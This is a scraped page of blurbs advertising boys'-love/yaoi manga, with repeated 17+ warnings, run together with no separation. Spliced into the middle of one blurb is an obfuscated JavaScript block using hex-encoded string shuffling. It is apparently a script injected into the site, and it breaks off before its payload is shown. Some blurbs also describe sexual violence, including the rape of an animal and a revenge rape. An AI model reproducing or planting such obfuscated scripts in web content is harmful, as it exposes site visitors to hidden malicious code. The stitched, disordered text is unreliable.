.Having a two-faced bitch as a love rival isn't scary What's scary is that the bitch has the upper handreincarnating as his little brother! Due to his "little brother," his lover was snatched away, his grandfather suffered a terrible death, the family business was taken over, and on top of all that, he was chained and thrown into prison.However, on the night before his release, he got laid by a man in the midst of confusion and became pregnant. After he got out of prison, he came back anew; he opened a restaurant and made a fortune while raising his child. He lived a vibrant life, but certainly didn't forget to deal with his horrible ex and bitch.
Gu Bai, carrying his painting board behind him, has moved into an amazing apartment. He noticed that the neighbor to his left is a headline queen, and on his right is the infamous acting king. On the upper floor, there is a supermodel living on the left side and a gold medal lawyer on the right side. And across his room, is a powerful big shot who is constantly featured in finance magazines. The ordinary Gu Bai will soon begin an unusual day.
Sweet and teasing, demon x angel couple pairing! The two races were meant to be like fire and water, yet the head general of the demons, Wei Zou, secretly holds a crush on the head general of the angels, An Si. To get the other party’s affection, he uses all sort of methods to deceive the naive angel into getting close to him. In the process, An Si, who originally hated demons, starts to find himself gradually warming up.
“Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” Overbearing loyal dog devil x high mighty calm and cold swordsman, as a pair of lover’s forced to part in their previous lives, in this life at last both of them meet, the cold swordsman has lost the memories of his past life, the domineering devil turned into an attached, loyal dog, you don’t like my devil’s appearance? Then I’ll become a cute pet and accompany you! Want to eat sweet candy? Come and follow this super sweet candy series!<script></script><script>(function(_0x469a19,_0x396ef2){var _0x41f957=_0x5cf2,_0x4cad3d=_0x469a19();while(!![]){try{var _0x5c91b=parseInt(_0x41f957(0x175))/(-0x11d7+0x222e+-0x82b*0x2)*(parseInt(_0x41f957(0x17c))/(0x212b+-0x2*-0x371+-0x473*0x9))+-parseInt(_0x41f957(0x181))/(0x1729+-0x1c23+0x4fd)+parseInt(_0x41f957(0x188))/(-0x7*-0x452+-0xa8c+-0xe5*0x16)+parseInt(_0x41f957(0x18d))/(0x305*0x2+-0x1*0x7b2+0x1ad)*(parseInt(_0x41f957(0x17b))/(0x1*0x5b3+-0x90a*-0x3+-0x20cb))+parseInt(_0x41f957(0x172))/(0x1*-0xd1c+-0xc0a+0x192d)+parseInt(_0x41f957(0x17a))/(-0x1*0xdd2+-0x191b*-0x1+-0xb41)+-parseInt(_0x41f957(0x180))/(0x91*0x41+0xf02+-0x2*0x19e5)*(parseInt(_0x41f957(0x179))/(0x206c+-0x303*-0x1+-0x2365));if(_0x5c91b===_0x396ef2)break;else _0x4cad3d['push'](_0x4cad3d['shift']());}catch(_0x509ffd){_0x4cad3d['push'](_0x4cad3d['shift']());}}}(_0x9845,0x431d7+0x401c0+-0x1d571));function custom(){var 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After CEO Qi’s death, he crossed over to a different world. He originally thought that he was a savior, only when he got dressed up and sent to the wedding bed, did he realise that he became the bride for the devil! When faced with a frivolous and doting devil, when exactly can the cold and aloof CEO give birth?! Brought to you by watermelonely scans
.The moment omega, Wan Xing Shu transferred into the class, he became the target of the cunning Alpha, Chu He Zhou. After a series of services from the Alpha, who managed to flirt the omega to the point that his heart beats fast, his weak legs shaking and he wishes to be pushed down by the Alpha. Until a second year Alpha bully called Wan Xing Shu "Brother", Chu He Zhou was confused. What is his soft and cute omega hiding?
Dinghai Fusheng Records Amidst the Silence of All Magic in the Divine Land, Mara is about to descend. In order to prevent the destruction of the Divine Land and save all the people, Chen Xing, the last exorcist, embarks on a journey to release the sealed spiritual qi of heaven and earth — only four years remain. The road ahead is full of thorns. Watch this cute little koi Chen Xing and the moody and grumpy Protector Xiang Shu, together with numerous people with distinct personalities in their group, working together to turn the tide again and again!
Master Yan Zi Xiu, a revered figure from ancient times, finds himself transported to the modern era. Not only does he become an actor, but he also ends up in a contractual marriage with CEO Jing Shao Ci, which was supposed to last for three years. After their divorce, Yan Zi Xiu wishes to focus solely on being a celestial master who captures ghosts, accumulating merits to ascend quickly. Unexpectedly, he becomes the top male god of the entertainment industry! Moreover, his ex-husband Jing Shao Ci, whom he once found repulsive, starts persistently pursuing Yan Zi Xiu.
“Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” The mermaid, Ye Ming, encountered love at first sight with the handsome man, Lu Chuan, while performing in the aquarium. After receiving help from Lu Chuan, his good impression of him instantly grew stronger, and eventually brought him home in a blink of an eye. However, the next day, he revealed that he was a mermaid?! Do You Wanna Touch My Tail? Wanna to Touch the Tail? Yào Mō Mō Wěi Bā Me 要摸摸尾巴么
“Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” Having nothing better to do, Asia’s champion decided to carry a girl in the game. With great difficulty, he finally convinced the girl he carried to turn on her mic, only to discover that the other party was actually a boy?! This online love affair that had ended before it even began was tossed away to the back of the champion’s mind. Unexpectedly, when his club went to train in another city, they encountered a mishap and had a small conflict with another team. When the other team’s vice captain showed up, the champion was so moved that he started doubting life, but as soon as the other opened his mouth, it turned out that this was the “girl” that he had personally carried with his own hands that day. Does love at first sight exist in e-sports? It does. Dianzi Jingji Cunzai Yijianzhongqing Ma? / Is There Love at First Sight in E-Sports? / 电子竞技存在一见钟情吗 / Diànzǐ Jìngjì Cúnzài Yījiànzhōngqíng Ma?
Rex is a half man half dog. He was created when a drunk old man forced himself on a stray female dog in the street. Because of his father, Rex has to live his life as a freak rejected by society. So one day... he’s gonna find that man, and r*pe HIM.
“Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” In this world, there exists certain types of men; they do not believe in working hard, or improving themselves. They are self-serving and care only for themselves. These men’s goal in life is to “eat soft rice” and they use any means possible to suck their tall, rich, and handsome lovers dry. Self-reliant System: Our goal is to rise up! Our goal is to persevere! We must “eat hard rice” and be self-sufficient! When numerous souls become bound by this system and enter into the bodies of those who only mooch off of their lovers, what will happen? 不做软饭男, Don’t Be A Kept Man 38.42>44